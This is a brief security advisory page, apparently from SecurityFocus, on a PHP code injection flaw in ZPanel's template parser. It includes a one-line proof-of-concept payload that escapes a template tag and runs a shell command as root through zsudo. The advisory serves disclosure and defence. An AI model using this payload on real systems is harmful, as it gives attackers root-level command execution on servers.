ZPanel 'templateparser.class.php' PHP Code Injection Vulnerability

Attackers can exploit this issue through a browser.

The following proof-of-concept is available:

<& bogus']; exec("/etc/zpanel/panel/bin/zsudo touch /root/derp"); echo $value['bogus &>


 

Privacy Statement
Copyright 2010, SecurityFocus